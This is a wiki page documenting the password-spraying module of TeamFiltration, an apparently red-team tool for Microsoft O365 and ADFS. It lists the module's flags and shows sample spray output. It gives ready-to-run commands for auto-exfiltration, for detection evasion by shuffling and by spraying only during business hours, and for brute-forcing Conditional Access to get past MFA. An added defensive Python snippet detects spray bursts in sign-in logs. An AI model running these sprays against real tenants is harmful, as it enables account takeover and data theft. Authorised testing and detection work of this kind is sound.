Spraying

Flangvik edited this page Mar 8, 2026 · 10 revisions

TeamFiltration's spray module provides password spraying capabilities for Microsoft O365 tenants (both non-gov and gov), as well as ADFS.

   --spray       Load the spraying module

         --aad-sso             Use SecureWorks's Azure Active Directory password brute-forcing technique when spraying
         --us-cloud            When spraying companies attached to US Tenants (https://login.microsoftonline.us/)
         --time-window         Defines a time window where spraying should occur, in the military time format <12:00-19:00>
         --passwords           Path to a list of passwords, common weak-passwords will be generated if not supplied
         --seasons-only        Password generated for spraying will only be based on seasons
         --months-only         Password generated for spraying will only be based on months
         --common-only         Spray with the top 20 most common passwords
         --combo               Path to a combolist of username:password
         --exclude             Path to a list of emails to exclude from spraying
         --shuffle-passwords   Shuffle the password list before spraying
         --shuffle-users       Shuffle the target user list before spraying
         --auto-exfil          Automatically start the exfil module if a valid login is found

         --sleep-min           Minimum minutes to sleep between each full rotation of spraying default=60
         --sleep-max           Maximum minutes to sleep between each full rotation of spraying default=100
         --jitter              Seconds between each individual authentication attempt. default=0
         --push                Get Pushover notifications when valid credentials are found (requires pushover keys in config)
         --push-locked         Get Pushover notifications when a sprayed account gets locked (requires pushover keys in config)
         --force               Force the spraying to proceed even if there is less than <sleep> time since the last attempt

By default, TeamFiltration pulls the validated emails from the local database and targets them for password spraying. If no password list is provided using the --passwords argument, a series of commonly used passwords based on the month, season, and year is generated automatically. You can also restrict generation to a single set using --seasons-only, --months-only, or --common-only.

[♥] TeamFiltration VX.X.X PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed --outpath F:\Dev\skywalker --config F:\Dev\config.txt --spray
[SPRAY] 23.01.2023 06:55:24 EST Sleeping between 60-100 minutes for each round
[SPRAY] 23.01.2023 06:55:30 EST Sprayed fennec.shand@legitcorp.net:January2023          => INVALID
[SPRAY] 23.01.2023 06:55:30 EST Sprayed kylo.ren@legitcorp.net:January2023              => INVALID
[SPRAY] 23.01.2023 06:55:30 EST Sprayed luke.skywalker@legitcorp.net:January2023        => INVALID
[SPRAY] 23.01.2023 06:55:31 EST Sprayed anakin.skywalker@legitcorp.net:January2023      => INVALID
[SPRAY] 23.01.2023 06:55:31 EST Sprayed han.solo@legitcorp.net:January2023              => INVALID
[SPRAY] 23.01.2023 06:55:31 EST Sprayed john.cannon@legitcorp.net:January2023           => INVALID

When a valid set of credentials is found, TeamFiltration stores the access token from the successful login in the database. The account is also excluded from all future spraying attempts.

This access token, together with the accompanying refresh token, is used when performing the exfiltration of data through the exfiltration module. This allows TeamFiltration to avoid creating unnecessary interactive logins when moving into the post-exploitation phase.

Conditional Access

If a valid set of credentials is found but the login attempt was blocked due to MFA or other restrictions enforced by Conditional Access, TeamFiltration will store the valid credentials in the database. When the account is targeted in the exfiltration module, TeamFiltration will identify a gap in the policy or policies by brute-forcing a series of login attempts using unique combinations of Resource URI, ClientId, and Device.
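
For defenders, both the pattern in the output above (one password tried against many accounts within a second or two) and the Conditional Access case (password accepted, sign-in blocked) show up in sign-in logs. The following Python is an added example, not part of TeamFiltration or the original page. The event layout, thresholds, IP addresses and the two extra accounts are constructed assumptions; the result codes are the Entra ID AADSTS codes named in the comments.

```python
from datetime import datetime, timedelta

BAD_PASSWORD = 50126                   # AADSTS50126: invalid username or password
PASSWORD_ACCEPTED = {0, 50076, 53003}  # success, MFA required, blocked by Conditional Access

def ev(ts, user, ip, code):
    return {"time": datetime.fromisoformat(ts), "user": user, "ip": ip, "code": code}

# Constructed sign-in events (assumed layout); IPs are documentation ranges.
D = "2023-01-23T"
SAMPLE = [
    ev(D + "06:55:30", "fennec.shand@legitcorp.net", "203.0.113.7", 50126),
    ev(D + "06:55:30", "kylo.ren@legitcorp.net", "203.0.113.7", 50126),
    ev(D + "06:55:30", "luke.skywalker@legitcorp.net", "203.0.113.7", 50126),
    ev(D + "06:55:31", "anakin.skywalker@legitcorp.net", "203.0.113.7", 50126),
    ev(D + "06:55:31", "han.solo@legitcorp.net", "203.0.113.7", 50126),
    ev(D + "06:55:31", "john.cannon@legitcorp.net", "203.0.113.7", 50126),
    ev(D + "06:55:31", "mace.windu@legitcorp.net", "198.51.100.20", 0),     # normal login
    ev(D + "06:55:32", "leia.organa@legitcorp.net", "203.0.113.7", 50076),  # valid password, MFA stopped it
    ev(D + "09:00:00", "han.solo@legitcorp.net", "198.51.100.20", 50126),   # lone typo
]

def find_spray_bursts(events, window=timedelta(minutes=5), min_users=5):
    """Flag windows where many distinct accounts fail on a bad password, and
    list accounts whose password was accepted from the same sources."""
    events = sorted(events, key=lambda e: e["time"])
    fails = [e for e in events if e["code"] == BAD_PASSWORD]
    bursts, i = [], 0
    while i < len(fails):
        start, j = fails[i]["time"], i
        while j < len(fails) and fails[j]["time"] - start <= window:
            j += 1
        users = {e["user"] for e in fails[i:j]}
        if len(users) < min_users:
            i += 1
            continue
        ips = {e["ip"] for e in fails[i:j]}  # failures counted tenant-wide, not per IP
        accepted = sorted({e["user"] for e in events
                           if e["code"] in PASSWORD_ACCEPTED and e["ip"] in ips
                           and start <= e["time"] <= start + window})
        bursts.append({"start": start, "targets": len(users),
                       "sources": sorted(ips), "password_accepted": accepted})
        i = j
    return bursts

if __name__ == "__main__":
    for b in find_spray_bursts(SAMPLE):
        print(b["start"], b["targets"], "accounts targeted;",
              "reset and review:", b["password_accepted"])
```

Accounts listed under `password_accepted` hold a password that is now known to the source of the burst even though no sign-in completed, so they warrant a password reset and a review of the Conditional Access policies that apply to them.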

Auto-Exfil

Using --auto-exfil will automatically trigger the exfiltration module as soon as a valid credential is found, without requiring manual intervention:

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --spray --auto-exfil --all

Shuffle Options

To reduce detection patterns, the order of users and passwords can be randomised:

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --spray --shuffle-users --shuffle-passwords

Combo List

If you have a username:password combo list, you can provide it directly instead of a separate password list:

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --spray --combo C:\combo.txt

Time Window

To restrict spraying to specific hours (e.g. business hours only, to blend in with normal traffic):

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --spray --time-window 08:00-18:00